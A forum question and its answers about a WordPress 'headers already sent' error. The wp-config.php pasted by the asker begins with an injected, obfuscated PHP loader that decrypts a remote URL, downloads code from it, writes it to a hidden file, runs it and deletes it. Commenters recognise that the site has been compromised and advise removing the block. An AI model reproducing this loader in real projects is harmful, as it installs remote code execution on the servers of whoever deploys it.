# Header information error in Wordpress

Tags: php, wordpress

My wp-admin page on my wordpress is giving me this error. I was getting a blank screen so I turned on debug.

```
Warning: Cannot modify header information - headers already sent by 
(output started at/home/content/n3pnexwpnas01_data01/71/3047171/html/wp-config.php:1) in 
/home/content/n3pnexwpnas01_data01/71/3047171/html/wp- 
includes/pluggable.php on line 1216
```

I checked my problematic wp-config.php file at line 1 and it doesn't seem to have extra spaces or extra tags at the beginning or end of the file that other guides recommend I get rid of. Does anyone have any advice?

This is the wp-config.php file

```
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrLUocQYT5ZtHJf/cM1fWdrpdmmSLH6uToRkH";
if (ini_get('allow_url_fopen')) {
    function get_data_ya($url) {
        $data = file_get_contents($url);
        return $data;
    }
}
else {
    function get_data_ya($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}
function wp_cd($fd, $fa="")
{
   $fe = "wp_frmfunct";
   $len = strlen($fd);
   $ff = '';
   $n = $len>100 ? 8 : 2;
   while( strlen($ff)<$len )
   {
      $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
   }
   return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
    if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
    $subdirs = glob("$dira/*", GLOB_ONLYDIR);
    foreach ($subdirs as $subdira) {
        if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
    }
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?><?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 *

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_1ab28k9bjk_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', true);
//define( 'WP_CACHE', true );
require_once( dirname( __FILE__ ) . '/gd-config.php' );
define( 'FS_METHOD', 'direct');
define('FS_CHMOD_DIR', (0705 & ~ umask()));
define('FS_CHMOD_FILE', (0604 & ~ umask()));


/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
```

Comment: You might want to [edit] this post to remove your database credentials...

Comment: Remove these two lines: `@ini_set('display_errors', '0');
error_reporting(0);` and then look above where it gives the header error. View the source code in the browser if you need to. There's most likely another error in there somewhere.

Comment: Considering the code at the top of the page (everything above `The base configuration for WordPress`), I think you've been hacked. You may want to start with a fresh installation if you can.

Answer (score 1):

I would guess your site got hacked so remove everything before the second `<?php`